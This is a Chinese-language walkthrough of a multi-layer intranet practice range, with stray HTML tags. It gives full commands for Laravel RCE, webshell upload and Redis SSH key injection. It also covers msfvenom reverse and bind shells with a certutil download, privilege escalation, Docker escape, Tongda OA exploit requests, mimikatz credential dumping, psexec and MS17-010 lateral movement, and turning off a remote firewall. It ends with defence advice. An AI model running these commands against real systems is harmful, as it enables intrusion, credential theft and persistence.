内网靶机渗透实战教学文档<\/h1>

环境概述<\/h2>

本靶场模拟了一个多层内网环境，包含以下组件：<\/p>

DMZ区<\/strong>：Ubuntu主机(web1)，运行Nginx和Redis服务<\/li>
第二层网络<\/strong>：Ubuntu主机(web2)，运行Docker容器<\/li>
第三层网络<\/strong>：Windows 7主机(PC1)，运行通达OA系统<\/li>

域环境<\/strong>：包含多台Windows主机<\/li> <\/ul>
初始账户信息<\/h3>

域用户<\/strong>：<\/p>

Administrator:Whoami2021<\/li>
whoami:Whoami2021<\/li>
bunny:Bunny2021<\/li>
moretz:Moretz2021<\/li> <\/ul> <\/li>

Ubuntu主机<\/strong>：<\/p>

web1: web:web2021<\/li>
web2: ubuntu:ubuntu<\/li> <\/ul> <\/li>

通达OA<\/strong>：<\/p>

admin:admin657260<\/li> <\/ul> <\/li> <\/ul>
渗透流程详解<\/h2>
第一阶段：外网渗透<\/h3>

端口扫描<\/strong><\/p>
nmap -T4 -sC -sV 192.168.46.160 <\/span><\/span><\/code><\/pre>发现81端口运行Laravel框架<\/p> <\/li> Laravel RCE漏洞利用(CVE-2021-3129)<\/strong><\/p> 使用公开EXP： python laravel-CVE-2021-3129-EXP.py http:\/\/目标地址 <\/span><\/span><\/code><\/pre><\/li> 上传Webshell（哥斯拉\/冰蝎\/蚁剑）<\/li> <\/ul> <\/li> 识别Docker环境<\/strong><\/p> 通过Webshell发现目标运行在Docker容器中<\/li> 准备进行Docker逃逸<\/li> <\/ul> <\/li> <\/ol> 第二阶段：Redis未授权访问利用<\/h3> 全端口扫描<\/strong><\/p> nmap -T4 -sC -sV -p1-65535 192.168.xx.xxx <\/span><\/span><\/code><\/pre>发现6379 Redis端口开放<\/p> <\/li> Redis未授权访问利用<\/strong><\/p> 连接Redis： redis-cli -h 192.168.xx.xxxxx <\/span><\/span><\/code><\/pre><\/li> SSH公钥注入： ssh-keygen -t rsa <\/span><\/span>(<\/span>echo -e "\n\n"<\/span>; cat \/root\/.ssh\/id_rsa.pub; echo -e "\n\n"<\/span>)<\/span> > 1.txt <\/span><\/span>cat 1.txt | redis-cli -h 192.168.46.160 -p 6379<\/span> -x set hello <\/span><\/span>config set dir \/root\/.ssh <\/span><\/span>config set dbfilename authorized_keys <\/span><\/span>save <\/span><\/span><\/code><\/pre><\/li> SSH连接： ssh root@192.168.46.160 <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 建立持久化会话<\/strong><\/p> 生成Linux后门： msfvenom -p linux\/x64\/meterpreter\/reverse_tcp lhost=<\/span>192.168.46.158 lport=<\/span>6666<\/span> -f elf -o p1.elf <\/span><\/span><\/code><\/pre><\/li> 上传并执行<\/li> MSF监听： use exploit\/multi\/handler <\/span><\/span>set payload linux\/x64\/meterpreter\/reverse_tcp <\/span><\/span>set lhost 192.168.46.158 <\/span><\/span>set lport 6666<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 第三阶段：内网横向移动<\/h3> 添加路由<\/strong><\/p> sessions 1<\/span> <\/span><\/span>run get_local_subnets <\/span><\/span>run autoroute -p <\/span><\/span>run post\/multi\/manage\/autoroute <\/span><\/span><\/code><\/pre><\/li> 内网探测<\/strong><\/p> use auxiliary\/scanner\/discovery\/udp_probe <\/span><\/span>set rhosts 192.168.52.1-255 <\/span><\/span>set threads 10<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> Linux提权<\/strong><\/p> 查找SUID文件： find \/ -user root -perm -4000 -print 2>\/dev\/null <\/span><\/span><\/code><\/pre><\/li> 环境变量提权： cd \/home\/jobs <\/span><\/span>.\/shell <\/span><\/span>chmod 777<\/span> pscp \/bin\/bash \/tmp\/ps <\/span><\/span>export PATH=<\/span>\/tmp:$PATH <\/span><\/span>.\/shell <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> Docker逃逸<\/strong><\/p> fdisk -l <\/span><\/span>mkdir \/hello <\/span><\/span>mount \/dev\/sda1 \/hello <\/span><\/span>cp -avx \/hello\/home\/ubuntu\/.ssh\/id_rsa.pub \/hello\/home\/ubuntu\/.ssh\/authorized_keys -avx <\/span><\/span>echo 'SSH公钥'<\/span> > \/hello\/home\/ubuntu\/.ssh\/authorized_keys <\/span><\/span>ssh -i 密钥文件 ubuntu@192.168.52.20 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 第四阶段：Windows域渗透<\/h3> 通达OA漏洞利用<\/strong><\/p> 任意用户登录漏洞：修改请求包，添加Uid头<\/li> 获取有效SESSID<\/li> <\/ul> <\/li> 文件上传漏洞： POST<\/span> \/ispirit\/im\/upload.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>[上传恶意文件]<\/span> <\/span><\/span><\/code><\/pre><\/li> 文件包含RCE： POST<\/span> \/ispirit\/interface\/gateway.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>json={"url":<\/span>"\/general\/..\/..\/attach\/im\/图片路径"}&cmd=whoami<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> Windows后门<\/strong><\/p> 生成后门： msfvenom -p windows\/meterpreter\/bind_tcp LPORT=<\/span>7777<\/span> -f exe > w7.exe <\/span><\/span><\/code><\/pre><\/li> 下载执行： certutil -urlcache -split -f http:\/\/192.168.52.10:81\/w7.exe c:\/w7.exe <\/span><\/span><\/code><\/pre><\/li> MSF监听： use exploit\/multi\/handler <\/span><\/span>set payload windows\/meterpreter\/bind_tcp <\/span><\/span>set rhost 192.168.52.30 <\/span><\/span>set lport 7777<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 域内横向移动<\/strong><\/p> 使用kiwi(mimikatz)获取凭据： load kiwi <\/span><\/span>kiwi_cmd sekurlsa::logonpasswords <\/span><\/span><\/code><\/pre><\/li> psexec横向移动： use exploit\/windows\/smb\/psexec <\/span><\/span>set payload windows\/meterpreter\/bind_tcp <\/span><\/span>set rhost 192.168.93.30 <\/span><\/span>set smbuser Administrator <\/span><\/span>set smbpass Whoami2021 <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> MS17-010利用： use exploit\/windows\/smb\/ms17_010_psexec <\/span><\/span>set payload windows\/meterpreter\/bind_tcp <\/span><\/span>set rhost 192.168.93.40 <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 防火墙绕过<\/strong><\/p> net use \\192.168.93.30\ipc$ "Whoami2021"<\/span> \/user:"Administrator"<\/span> <\/span><\/span>sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"<\/span> <\/span><\/span>sc \\192.168.93.30 start unablefirewall <\/span><\/span><\/code><\/pre><\/li> <\/ol> 关键漏洞总结<\/h2> Laravel Debug mode RCE (CVE-2021-3129)<\/strong><\/p> 影响版本：Laravel框架特定配置<\/li> 利用方式：通过公开EXP直接获取代码执行权限<\/li> <\/ul> <\/li> Redis未授权访问<\/strong><\/p> 利用方式：SSH公钥注入、写定时任务、写Webshell<\/li> 防御：设置密码认证、限制绑定IP<\/li> <\/ul> <\/li> Linux提权技术<\/strong><\/p> SUID提权<\/li> 环境变量提权<\/li> Docker逃逸<\/li> <\/ul> <\/li> 通达OA漏洞<\/strong><\/p> 任意用户登录<\/li> 文件上传+文件包含RCE<\/li> <\/ul> <\/li> Windows域渗透技术<\/strong><\/p> Mimikatz凭据获取<\/li> psexec横向移动<\/li> MS17-010永恒之蓝漏洞<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 基础安全措施<\/strong><\/p> 及时更新系统和应用补丁<\/li> 禁用不必要的服务和端口<\/li> 配置强密码策略<\/li> <\/ul> <\/li> 中间件安全<\/strong><\/p> Redis配置认证密码<\/li> Docker配置适当的隔离策略<\/li> <\/ul> <\/li> 内网安全<\/strong><\/p> 实施网络分段<\/li> 监控异常流量和行为<\/li> 限制域管理员权限<\/li> <\/ul> <\/li> 应用安全<\/strong><\/p> 关闭调试模式<\/li> 实施输入验证和过滤<\/li> 限制文件上传类型和目录<\/li> <\/ul> <\/li> <\/ol> 本教学文档涵盖了从外网渗透到内网横向移动的全过程，涉及多种漏洞利用和提权技术，可作为内网渗透测试的实战参考。<\/p>